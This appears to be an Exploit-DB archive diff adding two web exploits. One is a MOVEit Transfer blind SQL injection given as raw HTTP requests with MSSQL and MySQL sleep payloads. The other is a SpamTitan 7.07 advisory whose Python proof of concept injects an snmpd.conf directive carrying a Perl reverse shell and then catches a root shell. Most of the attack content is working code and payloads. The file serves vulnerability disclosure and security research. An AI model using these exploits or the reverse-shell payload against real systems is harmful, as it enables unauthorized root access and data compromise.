DB: 2020-10-06

2 changes to exploits/shellcodes

MOVEit Transfer 11.1.1 - 'token' Unauthenticated SQL Injection
SpamTitan 7.07 - Unauthenticated Remote Code Execution

exploits/multiple/webapps/48855.txt

@@ -0,0 +1,34 @@
+# Exploit Title: MOVEit Transfer 11.1.1 - 'token' Unauthenticated SQL Injection 
+# Google Dork: inurl:human.aspx intext:moveit
+# Date: 2020-10-05
+# Exploit Author: Aviv Beniash
+# Vendor Homepage: https://www.ipswitch.com/
+# Version: MOVEit Transfer 2018 SP2 before 10.2.4, 2019 before 11.0.2, and 2019.1 before 11.1.1
+# CVE : CVE-2019-16383
+# 
+# Related Resources:
+# https://community.ipswitch.com/s/article/SQL-Injection-Vulnerability
+# https://nvd.nist.gov/vuln/detail/CVE-2019-16383
+
+# Description:
+# The API call for revoking logon tokens is vulnerable to a
+# Time based blind SQL injection via the 'token' parameter
+
+# MSSQL payload:
+
+POST /api/v1/token/revoke HTTP/1.1
+Host: moveittransferstg
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 32
+
+token='; WAITFOR DELAY '0:0:10'--
+
+
+# MySQL payload:
+
+POST /api/v1/token/revoke HTTP/1.1
+Host: moveittransferstg
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 21
+
+token=' OR SLEEP(10);

exploits/php/webapps/48856.py

@@ -0,0 +1,275 @@
+# Exploit Title: SpamTitan 7.07 - Unauthenticated Remote Code Execution
+# Date: 2020-09-18
+# Exploit Author: Felipe Molina (@felmoltor)
+# Vendor Homepage: https://www.titanhq.com/spamtitan/spamtitangateway/
+# Software Link: https://www.titanhq.com/signup/?product_type=spamtitangateway
+# Version: 7.07
+# Tested on: FreeBSD
+# CVE : CVE-2020-11698
+
+---[SPUK-2020-09/SpamTitan Unauthenticated Remote Code Execution in
+snmp-x.php]------------------------------
+
+SECURITY ADVISORY:   SPUK-2020-09/SpamTitan Unauthenticated Remote
+Code Execution in snmp-x.php
+Affected Software:   SpamTitan Gateway 7.07 (possibly earlier versions)
+Vulnerability:       Unauthenticated Remote Code Execution
+CVSSv3:              10.0
+(https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)
+Severity:            Critical
+Release Date:        2020-04-17
+CVE:                 CVE-2020-11698
+
+I. Background
+~~~~~~~~~~~~~
+
+From www.spamtitan.com:
+
+"SpamTitan Gateway is a powerful Anti-Spam appliance that equips network
+administrators with extensive tools to control mail flow and protect against
+unwanted email and malware."
+
+II. Description
+~~~~~~~~~~~~~~~
+Improper input sanitization of the parameter "community" on the page
+snmp-x.php would allow a remote attacker to inject command directives into the
+file snmpd.conf. This would allow executing commands on the target server by
+by injecting an "extend" or "exec" SNMPD directive and querying the snmp daemon
+of the server for the correct OID.
+
+III. PoC
+~~~~~~~~
+
+Use python 3 and install the following modules: requests, pysnmp.
+If your IP is 192.168.1.5 and the target SpamTitan server is
+spamtitan.example.com, call the PoC like this:
+./poc.py -t spamtitan.example.com -i 192.168.1.5
+
+---------------------------------------------
+
+#!/usr/bin/env python
+
+# Author: Felipe Molina (@felmoltor)
+# Date: 09/04/2020
+# Python Version: 3.7
+# Summary: This is PoC for an unauthenticated RCE 0day on SpamTitan
+7.07 and previous versions.
+# The script abuses of two weaknesses on the product:
+# 1. Unauthenticated interaction with snmp-x.php script
+# 2. Injection of snmpd.conf configuration directives in multiple POST
+parameters such as "community" or "user_username" of snmp-x.php
+# Product URL: https://www.spamtitan.com/
+# Product Version: 7.07 and probably previous
+
+import requests
+requests.packages.urllib3.disable_warnings()
+import os
+import threading
+from optparse import OptionParser
+import socket
+import json
+from pysnmp.hlapi import *
+from urllib.parse import urlparse
+from time import sleep
+
+SNMPGETDELAY=5
+
+def parseoptions():
+    parser = OptionParser()
+    parser.add_option("-t", "--target", dest="target",
+                    help="Target SpamTitan URL to attack. E.g.:
+https://spamtitan.com/", default=None)
+    parser.add_option("-i", "--ip", dest="ip",
+                    help="Local IP where to listen for the reverse
+shell. Default: %s" % myip(), default=myip())
+    parser.add_option("-p", "--port", dest="port",
+                    help="Local Port where to listen for the reverse
+shell. Default: 4242", default=4242)
+    parser.add_option("-q", "--quiet",
+                    action="store_true", dest="quiet", default=False,
+                    help="Shut up script! Just give me the shell.")
+
+    return parser.parse_args()
+
+def printmsg(msg,quiet=False,msgtype="i"):
+    if (not quiet):
+        if (success):
+            print("[%s] %s" % (msgtype,msg))
+        else:
+            print("[-] %s" % msg)
+
+def info(msg,quiet=False):
+    printmsg(msg,quiet,msgtype="i")
+
+def success(msg,quiet=False):
+    printmsg(msg,quiet,msgtype="+")
+
+def fail(msg,quiet=False):
+    printmsg(msg,quiet,msgtype="-")
+
+def myip():
+    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
+    try:
+        # doesn't even have to be reachable
+        s.connect(('10.255.255.255', 1))
+        IP = s.getsockname()[0]
+    except:
+        IP = '127.0.0.1'
+    finally:
+        s.close()
+    return IP
+
+
+def shellServer(ip,port,quiet):
+    servers = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    servers.bind((ip, port))
+    servers.listen(1)
+    info("Waiting for incoming connection on %s:%s" % (ip,port))
+    conn, addr = servers.accept()
+    conn.settimeout(1)
+    success("Hurray, we got a connection from %s" % addr[0])
+
+    prompt =conn.recv(128)
+    prompt=str(prompt.decode("utf-8")).strip()
+    command = input(prompt)
+
+    while True:
+        try:
+            c = "%s\n" % (command)
+            if (len(c)>0):
+                conn.sendall(c.encode("utf-8"))
+                # Quit the console
+                if command == 'exit':
+                    info("\nClosing connection")
+                    conn.close()
+                    break
+                else:
+                    completeanswer=""
+                    while True:
+                        answer=None
+                        try:
+                            answer=str((conn.recv(1024)).decode("utf-8"))
+                            completeanswer+=answer
+                        except socket.timeout:
+                            completeanswer.strip()
+                            break
+                    print(completeanswer,end='')
+            command = input("")
+        except (KeyboardInterrupt, EOFError):
+            info("\nClosing connection")
+            break
+
+def triggerSNMPShell(target, community, triggeroid, port, quiet):
+    if (not quiet):
+        print("Waiting %s seconds to allow the main thread set-up the
+shell listener." % SNMPGETDELAY)
+    # Give the parent thread a few seconds to set up the shell
+listener before triggering the SNMP get query
+    sleep(SNMPGETDELAY)
+    if (not quiet):
+        print("Querying the SNMP server to launch the shell.")
+    targetp = urlparse(target)
+    errorIndication, errorStatus, errorIndex, varBinds = next(
+    getCmd(SnmpEngine(),
+           CommunityData(community, mpModel=0),
+           UdpTransportTarget((targetp.netloc, port)),
+           ContextData(),
+           ObjectType(ObjectIdentity(triggeroid)))
+    )
+    if errorIndication:
+        print("SNMP error: %s" % errorIndication)
+    elif errorStatus:
+        print('SNMP error status: %s at %s' % (errorStatus.prettyPrint(),
+                            errorIndex and varBinds[int(errorIndex) -
+1][0] or '?'))
+
+def main():
+    (options,arguments) = parseoptions()
+    q = options.quiet
+    t = options.target
+    i = options.ip
+    p = options.port
+    community="dummy"
+
+    if (t is None):
+        print("[-] Error. Specify a target (-t).")
+        exit()
+
+    if ((not "http://" in t) and (not "https://" in t)):
+        t = "http://%s/snmp-x.php" % t
+    else:
+        t = "%s/snmp-x.php" % t
+
+    if (not q):
+        print("[+] Attacking: %s.\nReceiving shell in %s:%s" % (t,i,p))
+
+    TARGETOID=".1.3.6.1.4.1.8072.1.3.2.3.1.1.8.114.101.118.115.104.101.108.108"
+    # PAYLOAD="extend revshell /usr/bin/perl -e 'use
+Socket;$i=\"%s\";$p=%s;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh
+-i\");};'" % (i,p)
+    PAYLOAD="extend revshell /usr/bin/perl -e 'use
+Socket;$i=\"%s\";$p=%s;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh
+-i\");};'" % (i,p)
+    TOGGLESNMP={
+        "jaction":"toggleSNMP",
+        "newval":"1"
+    }
+    INJECTION={
+        "jaction":"saveAll",
+        "contact":"CONTACT",
+        "name":"SpamTitan",
+        "location":"LOCATION",
+        # Add our IP as allowed to query the injected "dummy" community
+        # Add also the perl payload in a new line (%0a) of the snmpd.conf file
+        "community":'%s" %s\n%s # ' % (community,i,PAYLOAD)
+    }
+
+    rev_thread = threading.Thread(target=triggerSNMPShell, args=(t,
+community, TARGETOID, 161,q))
+    rev_thread.start()
+
+    # Start a thread to listen for incoming reverse shells:
+    if (not q):
+        print("[+] Launching a reverse shell listener to wait for the shell.")
+
+    # Send the SNMP request to add a community and append an "extend"
+command to execute scripts
+    # SpamTitan would add a new line in the snmpd.conf file with the
+new community name and the "extend" script
+    inj_res = requests.post(t,INJECTION,verify=False)
+    if (inj_res.status_code == 200):
+        if (not q):
+            print("Spawning a reverse shell listener. Wait for it...")
+        shellServer(options.ip,int(options.port),options.quiet)
+    else:
+        print("Error. The target is probably not vulnerable (returned
+a %s code)." % inj_res.status_code)
+
+main()
+
+---------------------------------------------
+
+III. Impact
+~~~~~~~~~~~
+
+The snmpd daemon is running as root in the target server. The
+pressented PoC would return a root shell without need of any
+registered user in the target server. There is total loss of
+confidentiality, integrity and availability on the SpamTitan server.
+
+IV. Disclosure
+~~~~~~~~~~~~~~
+
+Reported By: Felipe Molina de la Torre
+
+Vendor Informed:        2020-04-17
+Patch Release Date:     2020-05-26
+Advisory Release Date:  2019-09-18
+
+V. References
+~~~~~~~~~~~~~
+* https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11698
+* https://sensepost.com/blog/2020/clash-of-the-spamtitan/
+
+---------------------------------[SPUK-2020-09/SpamTitan
+Unauthenticated Remote Code Execution in snmp-x.php]---

files_exploits.csv

@@ -42993,6 +42993,8 @@ id,file,description,date,author,type,platform,port
 48654,exploits/java/webapps/48654.txt,"Exhibitor Web UI 1.7.1 - Remote Code Execution",2020-07-07,"Logan Sanderson",webapps,java,
 48853,exploits/php/webapps/48853.py,"MedDream PACS Server 6.8.3.751 - Remote Code Execution (Authenticated)",2020-10-02,bzyo,webapps,php,
 48854,exploits/php/webapps/48854.txt,"Photo Share Website 1.0 - Persistent Cross-Site Scripting",2020-10-02,Augkim,webapps,php,
+48855,exploits/multiple/webapps/48855.txt,"MOVEit Transfer 11.1.1 - 'token' Unauthenticated SQL Injection",2020-10-05,"Aviv Beniash",webapps,multiple,
+48856,exploits/php/webapps/48856.py,"SpamTitan 7.07 - Unauthenticated Remote Code Execution",2020-10-05,"Felipe Molina",webapps,php,
 48655,exploits/php/webapps/48655.php,"PHP 7.4 FFI - 'disable_functions' Bypass",2020-07-07,"hunter gregal",webapps,php,
 48656,exploits/php/webapps/48656.txt,"Wordpress Plugin Powie's WHOIS Domain Check 0.9.31 - Persistent Cross-Site Scripting",2020-07-09,mqt,webapps,php,
 48659,exploits/asp/webapps/48659.txt,"HelloWeb 2.0 - Arbitrary File Download",2020-07-10,bRpsd,webapps,asp,